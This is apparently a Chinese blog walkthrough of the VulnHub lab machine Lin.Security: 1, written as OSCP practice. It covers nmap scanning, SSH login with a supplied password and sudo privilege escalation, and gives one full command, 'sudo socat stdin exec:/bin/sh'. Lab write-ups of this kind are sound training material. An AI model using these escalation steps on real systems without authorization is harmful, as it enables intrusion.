---------------------------------------------------------------
本文题干阅读时间推荐5min,靶场练习推荐1h
----------------------------------------------------------------
如果各位童鞋想讨论以下相关内容,欢迎关注公众号, 联系我:
-
OSCP相关技术(备考中)
-
CISSP备考经验(已通过认证)
-
CCSK(云安全)(已通过认证)
-
ISO/IEC 27001 Foundation(已通过认证)
----------------------------------------------------------------
一、前言
主要利用方式:靶机信息获取+sudo提权(若干提权练习)
二、靶机信息
靶场: vulnhub.com
靶机名称: LIN.SECURITY: 1
难度: 简单
发布时间: 2018年 7月 11日
下载地址:https://vulnhub.com/entry/linsecurity-1,244/
备注:
三、虚拟机配置
VirtualBox、网络连接模式:NAT模式、DHCP服务:启用、IP地址:自动分配
攻击IP:10.0.2.7
靶机IP:10.0.2.29
四、信息收集
1、探测靶机ip地址
└─$ sudo arp-scan -I eth0 -l
2、探测靶机ip端口及端口具体服务
└─$ sudo nmap -p- 10.0.2.29
└─$ sudo nmap -p22,111,2049,37603,43715,56869,60121 -sV -A 10.0.2.29
五、漏洞利用(突破边界)
3、靶机介绍处有一个用户级密码
4、尝试SSH登录
└─$ ssh bob@10.0.2.29
六、提权
5、边界用户拿到权限,尝试进行提权动作
bob@linsecurity:~$ sudo -l
6、各sudo提权执行
https://gtfobins.github.io/#
通过ash的sudo权限进行提权
通过socat的sudo权限进行提权
bob@linsecurity:~$ sudo socat stdin exec:/bin/sh
通过find的sudo权限进行提权
通过ssh的sudo权限进行提权
8、IP验证
-----------------------------------------------
本期靶场到此就结束啦,我们下期再见
--------------------------------------------------
走之前记得点个“在看”哟~
原文始发于微信公众号(从放弃到入门):【OSCP模拟-No.37】 Lin.Security: 1靶机渗透测试练习
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论